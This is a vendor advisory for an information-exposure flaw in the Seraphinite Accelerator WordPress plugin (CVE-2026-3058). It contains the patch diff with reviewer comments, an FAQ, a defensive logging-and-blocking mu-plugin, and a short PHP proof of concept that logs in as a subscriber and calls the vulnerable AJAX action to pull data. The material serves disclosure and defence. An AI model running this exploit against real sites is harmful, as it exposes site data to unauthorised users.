Atomic Edge analysis of CVE-2026-3058:
The vulnerability is a missing capability check in the `OnAdminApi_GetData()` function of the Seraphinite Accelerator WordPress plugin. This function handles the `seraph_accel_api` AJAX action when the `fn` parameter is `GetData`. The vulnerable code, in `main.php`, did not verify the caller's permissions before executing. Any authenticated user, including one with the low-privilege Subscriber role, could send a crafted AJAX request to the WordPress `/wp-admin/admin-ajax.php` endpoint with the `action` parameter set to `seraph_accel_api` and the `fn` parameter set to `GetData`. Successful exploitation allowed attackers to retrieve sensitive operational data, including cache status, scheduled task information, and external database state. The patch adds a capability check using `current_user_can('manage_options')` at the beginning of `OnAdminApi_GetData()` (lines 2310-2312 in the patched `main.php`), restricting access to users with administrator-level permissions and closing the information exposure. The impact is exposure of internal plugin and system state to low-privileged users, which could aid further attacks.

CVE-2026-3058: Seraphinite Accelerator <= 2.28.14 – Authenticated (Subscriber+) Exposure of Sensitive Information to an Unauthorized Actor (seraphinite-accelerator)
CVE ID: CVE-2026-3058
Plugin slug: seraphinite-accelerator
Vulnerable version: 2.28.14
Patched version: 2.28.15
Analysis Overview
Differential between vulnerable and patched code
--- a/seraphinite-accelerator/Cmn/Gen.php
+++ b/seraphinite-accelerator/Cmn/Gen.php
@@ -3654,7 +3654,7 @@
if( !isset( $args[ 'provider' ] ) )
$args[ 'provider' ] = 'CURL';
if( !isset( $args[ 'user-agent' ] ) )
- $args[ 'user-agent' ] = 'seraph-accel-Agent/2.28.14';
+ $args[ 'user-agent' ] = 'seraph-accel-Agent/2.28.15';
if( !isset( $args[ 'timeout' ] ) )
$args[ 'timeout' ] = 5;
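Review bot: the release version is a hard-coded string literal here (`'seraph-accel-Agent/2.28.14'` becomes `'seraph-accel-Agent/2.28.15'`) and the same literal is repeated in every file touched below; define the version once (for example a constant populated from the `Version:` header in plugin_root.php) so a release bump cannot miss a site and the actual security fix in main.php is not buried among twenty mechanical edits.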
--- a/seraphinite-accelerator/Cmn/Plugin.php
+++ b/seraphinite-accelerator/Cmn/Plugin.php
@@ -306,7 +306,7 @@
$args[ 'epid' ] = Wp::GetSiteId();
$args[ 'id' ] = 'wordpress-accelerator';
$args[ 'name' ] = 'Accelerator';
- $args[ 'v' ] = '2.28.14';
+ $args[ 'v' ] = '2.28.15';
$args[ 'pk' ] = 'Base';
$args[ 'cfg' ] = '';
$args[ 'loc' ] = Wp::GetLocale();
@@ -328,11 +328,11 @@
if( $lastCheckPackage === null && $lastCheckVer !== null )
$lastCheckPackage = 'Base';
- if( $lastCheckVer !== '2.28.14' || $lastCheckPackage !== 'Base' )
+ if( $lastCheckVer !== '2.28.15' || $lastCheckPackage !== 'Base' )
{
$state = Plugin::StateGet();
- if( $lastCheckVer !== '2.28.14' && !isset( $state[ 'changeVerCheck' ] ) )
+ if( $lastCheckVer !== '2.28.15' && !isset( $state[ 'changeVerCheck' ] ) )
{
$state[ 'changeVerCheck' ] = $lastCheckVer !== null ? $lastCheckVer : '';
Plugin::StateSet( $state );
@@ -349,7 +349,7 @@
if( !$bForce )
{
- if( $bFirstTimeOnly && $lastCheckVer == '2.28.14' )
+ if( $bFirstTimeOnly && $lastCheckVer == '2.28.15' )
return( Gen::S_FALSE );
$lastUpdTime = ($data[ 'updTime' ]??null);
@@ -368,7 +368,7 @@
$args[ 'epid' ] = Wp::GetSiteId();
$args[ 'id' ] = 'wordpress-accelerator';
$args[ 'name' ] = 'Accelerator';
- $args[ 'v' ] = '2.28.14';
+ $args[ 'v' ] = '2.28.15';
$args[ 'pk' ] = 'Base';
$args[ 'cfg' ] = '';
$args[ 'loc' ] = Wp::GetLocale();
@@ -385,7 +385,7 @@
if( $data[ 'mdfTime' ] >= $timeMdf )
{
$data[ 'updTime' ] = $curUpdTime;
- $data[ 'plgVer' ] = '2.28.14';
+ $data[ 'plgVer' ] = '2.28.15';
$data[ 'plgPk' ] = 'Base';
$hr = PluginOptions::Set( self::STG_VER, self::STG_ID, $data, __CLASS__ . '::' );
@@ -402,7 +402,7 @@
$data[ 'mdfTime' ] = $timeMdf;
$data[ 'updTime' ] = $curUpdTime;
- $data[ 'plgVer' ] = '2.28.14';
+ $data[ 'plgVer' ] = '2.28.15';
$data[ 'plgPk' ] = 'Base';
if( $timeMdf )
@@ -1459,10 +1459,10 @@
$rmtCfg = PluginRmtCfg::Get();
$urlProductInfo = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlProductInfo' );
- $urlAboutPluginImg = file_exists( __DIR__ . '/../Images/ProductLogo.png' ) ? add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( '../Images/ProductLogo.png', __FILE__ ) ) : null;
+ $urlAboutPluginImg = file_exists( __DIR__ . '/../Images/ProductLogo.png' ) ? add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( '../Images/ProductLogo.png', __FILE__ ) ) : null;
$urlAboutPluginDocs = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlProductDocs' );
$urlAboutPluginSupport = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlProductSupport' );
- $url3rdPartySoft = file_exists( __DIR__ . '/../third-party-software.html' ) ? add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( '../third-party-software.html', __FILE__ ) ) : null;
+ $url3rdPartySoft = file_exists( __DIR__ . '/../third-party-software.html' ) ? add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( '../third-party-software.html', __FILE__ ) ) : null;
$urlEula = null;
@@ -1471,7 +1471,7 @@
$res .= Ui::Tag( 'p' );
{
- $version = esc_html( '2.28.14' );
+ $version = esc_html( '2.28.15' );
$res .= Ui::TagOpen( 'div' );
@@ -1520,7 +1520,7 @@
{
$rmtCfg = PluginRmtCfg::Get();
- $urlAboutUsLogoImg = file_exists( __DIR__ . '/../Images/VendorLogo.png' ) ? add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( '../Images/VendorLogo.png', __FILE__ ) ) : null;
+ $urlAboutUsLogoImg = file_exists( __DIR__ . '/../Images/VendorLogo.png' ) ? add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( '../Images/VendorLogo.png', __FILE__ ) ) : null;
$urlMorePlugins = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlMorePlugins' );
$urlMoreInfo = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlMain' );
@@ -2049,7 +2049,7 @@
return( null );
$verFrom = self::_PrevVer_GetInt( $plgVerPrev );
- $verTo = self::_PrevVer_GetInt( '2.28.14' );
+ $verTo = self::_PrevVer_GetInt( '2.28.15' );
if( $verTo < $verFrom )
list( $verTo, $verFrom ) = array( $verFrom, $verTo );
@@ -2174,7 +2174,7 @@
if( (self::$g_aAlreadyIncludedObj[ 'css' ][ $id ]??null) )
continue;
- wp_enqueue_style( Plugin::CmnScriptId( $id ), add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.css' ), array(), '2.28.14' );
+ wp_enqueue_style( Plugin::CmnScriptId( $id ), add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.css' ), array(), '2.28.15' );
self::$g_aAlreadyIncludedObj[ 'css' ][ $id ] = true;
}
@@ -2241,7 +2241,7 @@
$scrHndId = Plugin::CmnScriptId( $id );
- wp_register_script( $scrHndId, add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.js' ), $deps, '2.28.14' );
+ wp_register_script( $scrHndId, add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.js' ), $deps, '2.28.15' );
if( $id == 'Gen' )
Plugin::Loc_ScriptLoad( $scrHndId );
wp_enqueue_script( $scrHndId );
@@ -2686,7 +2686,7 @@
var sendDataUrl = "<?php echo( Gen::GetArrField( $rmtCfg, 'Questionnaires.SendAnswerUrlTpl' ) ); ?>";
sendDataUrl = sendDataUrl.replace( "{EndPointId}", encodeURI( "<?php echo( Wp::GetSiteId() ); ?>" ) );
- sendDataUrl = sendDataUrl.replace( "{PluginVersion}", encodeURI( "2.28.14" ) );
+ sendDataUrl = sendDataUrl.replace( "{PluginVersion}", encodeURI( "2.28.15" ) );
sendDataUrl = sendDataUrl.replace( "{PluginMode}", encodeURI( "base" ) );
sendDataUrl = sendDataUrl.replace( "{PluginPackage}", encodeURI( "Base" ) );
sendDataUrl = sendDataUrl.replace( "{QuestionnaireId}", encodeURI( "<?php echo( ($q[ 'id' ]??null) ); ?>" ) );
--- a/seraphinite-accelerator/cache.php
+++ b/seraphinite-accelerator/cache.php
@@ -676,7 +676,7 @@
}
if( $bHdr )
- @header( 'X-Seraph-Accel-Cache: 2.28.14;' . $debugInfo );
+ @header( 'X-Seraph-Accel-Cache: 2.28.15;' . $debugInfo );
if( $bLog )
{
@@ -1583,7 +1583,7 @@
if( ($settCache[ 'normAgent' ]??null) )
{
$_SERVER[ 'SERAPH_ACCEL_ORIG_USER_AGENT' ] = ($_SERVER[ 'HTTP_USER_AGENT' ]??'');
- $_SERVER[ 'HTTP_USER_AGENT' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14';
+ $_SERVER[ 'HTTP_USER_AGENT' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15';
}
if( ($settCache[ 'views' ]??null) )
--- a/seraphinite-accelerator/common.php
+++ b/seraphinite-accelerator/common.php
@@ -4169,7 +4169,7 @@
function GetViewTypeUserAgent( $viewsDeviceGrp )
{
- return( 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14 ' . ucwords( implode( ' ', Gen::GetArrField( $viewsDeviceGrp, array( 'agents' ), array() ) ) ) );
+ return( 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15 ' . ucwords( implode( ' ', Gen::GetArrField( $viewsDeviceGrp, array( 'agents' ), array() ) ) ) );
}
function CorrectRequestScheme( &$serverArgs, $target = null )
@@ -5473,7 +5473,7 @@
$args = array( 'sslverify' => false, 'timeout' => $timeout, 'headers' => array() );
if( $userAgentCmn )
- $args[ 'headers' ][ 'User-Agent' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14';
+ $args[ 'headers' ][ 'User-Agent' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15';
global $seraph_accel_g_aGetExtContentsFailedSrvs;
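Review bot: the unchanged context line `$args = array( 'sslverify' => false, 'timeout' => $timeout, 'headers' => array() );` disables TLS certificate verification for this outbound request; that is not part of the version bump, but since the hunk is being touched, either enable verification or document why it must stay off for this call.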
@@ -5981,7 +5981,7 @@
foreach( $aHdrs as $hdrsId => $headers )
{
if( !isset( $headers[ 'User-Agent' ] ) )
- $headers[ 'User-Agent' ] = ($headers[ 'X-Seraph-Accel-Postpone-User-Agent' ]??'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14');
+ $headers[ 'User-Agent' ] = ($headers[ 'X-Seraph-Accel-Postpone-User-Agent' ]??'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15');
$headers[ 'User-Agent' ] = str_replace( 'seraph-accel-Agent/', 'seraph-accel-Agent-WarmUp/', $headers[ 'User-Agent' ] );
if( isset( $headers[ 'X-Seraph-Accel-Geo-Remote-Addr' ] ) )
--- a/seraphinite-accelerator/main.php
+++ b/seraphinite-accelerator/main.php
@@ -41,7 +41,7 @@
function _AddMenus( $accepted = false )
{
- add_menu_page( Plugin::GetPluginString( 'TitleLong' ), Plugin::GetNavMenuTitle(), 'manage_options', 'seraph_accel_manage', $accepted ? 'seraph_accel\_ManagePage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent', Plugin::FileUri( 'icon.png?v=2.28.14', __FILE__ ) );
+ add_menu_page( Plugin::GetPluginString( 'TitleLong' ), Plugin::GetNavMenuTitle(), 'manage_options', 'seraph_accel_manage', $accepted ? 'seraph_accel\_ManagePage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent', Plugin::FileUri( 'icon.png?v=2.28.15', __FILE__ ) );
add_submenu_page( 'seraph_accel_manage', esc_html_x( 'Title', 'admin.Manage', 'seraphinite-accelerator' ), esc_html_x( 'Title', 'admin.Manage', 'seraphinite-accelerator' ), 'manage_options', 'seraph_accel_manage', $accepted ? 'seraph_accel\_ManagePage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent' );
add_submenu_page( 'seraph_accel_manage', Wp::GetLocString( 'Settings' ), Wp::GetLocString( 'Settings' ), 'manage_options', 'seraph_accel_settings', $accepted ? 'seraph_accel\_SettingsPage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent' );
}
@@ -1285,7 +1285,7 @@
function _ManagePage()
{
Plugin::CmnScripts( array( 'Cmn', 'Gen', 'Ui', 'Net', 'AdminUi' ) );
- wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.14' );
+ wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.15' );
Plugin::Loc_ScriptLoad( Plugin::ScriptId( 'Admin' ) );
wp_enqueue_script( Plugin::ScriptId( 'Admin' ) );
@@ -1527,7 +1527,7 @@
{
$rmtCfg = PluginRmtCfg::Get();
- $urlLogoImg = add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( 'Images/hosting-icon-banner.svg', __FILE__ ) );
+ $urlLogoImg = add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( 'Images/hosting-icon-banner.svg', __FILE__ ) );
$urlMoreInfo = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlHostingInfo' );
$res = '';
@@ -2307,10 +2307,12 @@
function OnAdminApi_GetData( $args )
{
+ $res = array();
- $siteId = !($args[ 'allSites' ]??null) ? GetSiteId() : null;
+ if( !current_user_can( 'manage_options' ) )
+ return( $res );
- $res = array();
+ $siteId = !($args[ 'allSites' ]??null) ? GetSiteId() : null;
if( $siteId )
{
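Review bot: the new guard at the top of `OnAdminApi_GetData()` returns the empty `$res` array on denial, so a caller cannot tell "not permitted" from "no data"; return an explicit error instead (a `WP_Error` or `wp_send_json_error( ..., 403 )`, whichever the `seraph_accel_api` dispatcher expects) so refused calls are visible in client handling and server logs. Only the capability check is visible in this hunk; confirm that the dispatcher also verifies a nonce for this action, since `current_user_can()` alone does not protect an administrator's browser from being made to issue the request.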
@@ -2478,6 +2480,9 @@
function OnAdminApi_LogClear( $args )
{
+ if( !current_user_can( 'manage_options' ) )
+ return;
+
Gen::LogClear( GetCacheDir() . LogGetRelativeFile(), true );
}
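Review bot: this is the second handler in the same patch to receive an identical `current_user_can( 'manage_options' )` guard; rather than adding it handler by handler, enforce it once where `seraph_accel_api` dispatches on `fn`, so every existing and future `OnAdminApi_*` handler is covered by default and a forgotten handler fails closed. The bare `return;` also gives the client no indication that the log clear was refused; an explicit error response would make denied attempts observable.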
--- a/seraphinite-accelerator/oper.php
+++ b/seraphinite-accelerator/oper.php
@@ -1215,7 +1215,7 @@
foreach( $viewId === null ? array( 'cmn' ) : $viewId as $viewIdI )
if( CacheOpViewsHeadersGetViewId( $viewIdI ) == 'cmn' )
- $res[ $viewIdI ] = array( 'User-Agent' => 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14' );
+ $res[ $viewIdI ] = array( 'User-Agent' => 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15' );
if( ($settCache[ 'views' ]??null) )
{
--- a/seraphinite-accelerator/options.php
+++ b/seraphinite-accelerator/options.php
@@ -141,7 +141,7 @@
}
Plugin::CmnScripts( array( 'Cmn', 'Gen', 'Ui', 'Net', 'AdminUi' ) );
- wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.14' );
+ wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.15' );
Plugin::Loc_ScriptLoad( Plugin::ScriptId( 'Admin' ) );
wp_enqueue_script( Plugin::ScriptId( 'Admin' ) );
--- a/seraphinite-accelerator/plugin_root.php
+++ b/seraphinite-accelerator/plugin_root.php
@@ -5,7 +5,7 @@
Description: Turns on site high speed to be attractive for people and search engines.
Text Domain: seraphinite-accelerator
Domain Path: /languages
-Version: 2.28.14
+Version: 2.28.15
Author: Seraphinite Solutions
Author URI: https://www.s-sols.com
License: GPLv2 or later (if another license is not provided)
Proof of Concept (PHP)
NOTICE:
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3058 - Seraphinite Accelerator <= 2.28.14 - Authenticated (Subscriber+) Exposure of Sensitive Information to an Unauthorized Actor

// Configuration
$target_url = 'https://target-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress to obtain a valid session cookie.
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Exploit the vulnerable AJAX endpoint to retrieve sensitive data.
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'seraph_accel_api',
    'fn' => 'GetData'
)));
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Output the sensitive data returned by the plugin.
echo $response;
?>
Frequently Asked Questions
What is CVE-2026-3058?
Overview of the vulnerability
CVE-2026-3058 is a medium severity vulnerability in the Seraphinite Accelerator plugin for WordPress, affecting versions up to and including 2.28.14. It allows authenticated users with Subscriber-level access to exploit the plugin's AJAX action to retrieve sensitive operational data.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the lack of capability checks in the `OnAdminApi_GetData()` function. Authenticated users can send crafted AJAX requests to the WordPress admin endpoint, allowing them to access sensitive data such as cache status and scheduled tasks.
Who is affected by CVE-2026-3058?
Identifying vulnerable installations
Any WordPress site using the Seraphinite Accelerator plugin version 2.28.14 or earlier is affected. This includes sites with users who have Subscriber-level access or higher.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Seraphinite Accelerator plugin installed. If it is version 2.28.14 or earlier, your site is at risk. Additionally, review user roles to identify any Subscriber-level accounts.
How can I fix CVE-2026-3058?
Updating the plugin
The vulnerability is patched in version 2.28.15 of the Seraphinite Accelerator plugin. Updating to this version will apply the necessary capability checks and mitigate the risk of sensitive information exposure.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider temporarily disabling the plugin or restricting user access to prevent authenticated users from exploiting the vulnerability. Monitor user roles closely until the update can be applied.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the risk is not critical, it still poses a significant threat that should be addressed promptly to protect sensitive information.
What are the practical implications of this vulnerability?
Potential risks to your site
The practical implications include the risk of unauthorized access to sensitive operational data by low-privileged users. This information could facilitate further attacks or exploitation of the site.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint. It illustrates the steps needed to authenticate and retrieve sensitive data, confirming the existence of the issue.
What specific data can be exposed due to this vulnerability?
Types of sensitive information at risk
The vulnerability can expose various types of sensitive data, including the cache status, scheduled task information, and the state of external databases. This information can be valuable for attackers.
Is there a way to monitor for exploitation attempts?
Detecting potential attacks
To monitor for exploitation attempts, consider implementing logging for AJAX requests and reviewing access logs for unusual patterns. Additionally, security plugins may help detect and alert on suspicious activity.
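For the two questions above (what to do when the update cannot be applied yet, and how to monitor for attempts), the following must-use plugin is an added example, not code from the original page or from the vendor: it refuses and logs `seraph_accel_api` calls to `GetData` and `LogClear` from users without `manage_options`, the same condition the 2.28.15 patch enforces, and stands down once the installed `plugin_root.php` header reports 2.28.15 or later. The install path `wp-content/mu-plugins/` and the `[cve-2026-3058-guard]` log prefix are assumptions; the plugin directory name is the slug given on this page.

```php
<?php
/*
Plugin Name: CVE-2026-3058 interim guard (added example, not vendor code)
Description: Refuses and logs seraph_accel_api GetData/LogClear calls from users
without manage_options until Seraphinite Accelerator 2.28.15 or later is installed.
*/

namespace CveGuard\SeraphAccel;

// The two handlers the 2.28.15 diff shows gaining a capability check.
const GUARDED_FNS = array( 'GetData', 'LogClear' );

// Pure decision rule, kept free of WordPress calls so it can be reasoned about alone.
// $request is the merged GET/POST array; $can_manage is current_user_can('manage_options').
function should_block( array $request, $can_manage ) {
	$action = isset( $request['action'] ) ? (string) $request['action'] : '';
	$fn     = isset( $request['fn'] ) ? (string) $request['fn'] : '';
	return 'seraph_accel_api' === $action
		&& in_array( $fn, GUARDED_FNS, true )
		&& ! $can_manage;
}

// True while the installed plugin is older than the fixed release (version read from
// the plugin_root.php header shown in the diff), so the guard retires itself after update.
function guard_needed() {
	$main = WP_PLUGIN_DIR . '/seraphinite-accelerator/plugin_root.php';
	if ( ! file_exists( $main ) ) {
		return false; // plugin absent: nothing to protect
	}
	if ( ! function_exists( 'get_plugin_data' ) ) {
		require_once ABSPATH . 'wp-admin/includes/plugin.php';
	}
	$data = get_plugin_data( $main, false, false );
	return version_compare( $data['Version'], '2.28.15', '<' );
}

// admin-ajax.php fires admin_init before dispatching wp_ajax_{action}, so refusing
// here means the plugin handler never runs for the denied request.
function guard_admin_ajax() {
	if ( ! ( defined( 'DOING_AJAX' ) && DOING_AJAX ) ) {
		return;
	}
	$request = wp_unslash( $_REQUEST );
	if ( ! should_block( $request, current_user_can( 'manage_options' ) ) || ! guard_needed() ) {
		return;
	}
	// Log the attempt: this is the signal the monitoring question above asks for.
	$user = wp_get_current_user();
	error_log( sprintf(
		'[cve-2026-3058-guard] refused fn=%s user_id=%d login=%s ip=%s',
		$request['fn'], // already validated against GUARDED_FNS
		$user->ID,
		$user->user_login,
		isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-'
	) );
	wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
}

add_action( 'admin_init', __NAMESPACE__ . '\guard_admin_ajax', 0 );
```

Drop the file into the mu-plugins directory (assumed path) and watch the PHP error log for the `[cve-2026-3058-guard]` prefix; the guard only fires for the two handlers named and only while the installed version is below 2.28.15.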
What should I do after updating the plugin?
Post-update actions
After updating the plugin, verify that the capability checks are functioning correctly by testing the AJAX action with different user roles. Regularly review user permissions and keep your plugins updated to prevent future vulnerabilities.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website and the internet. Our AI inspection and analysis engine auto-blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations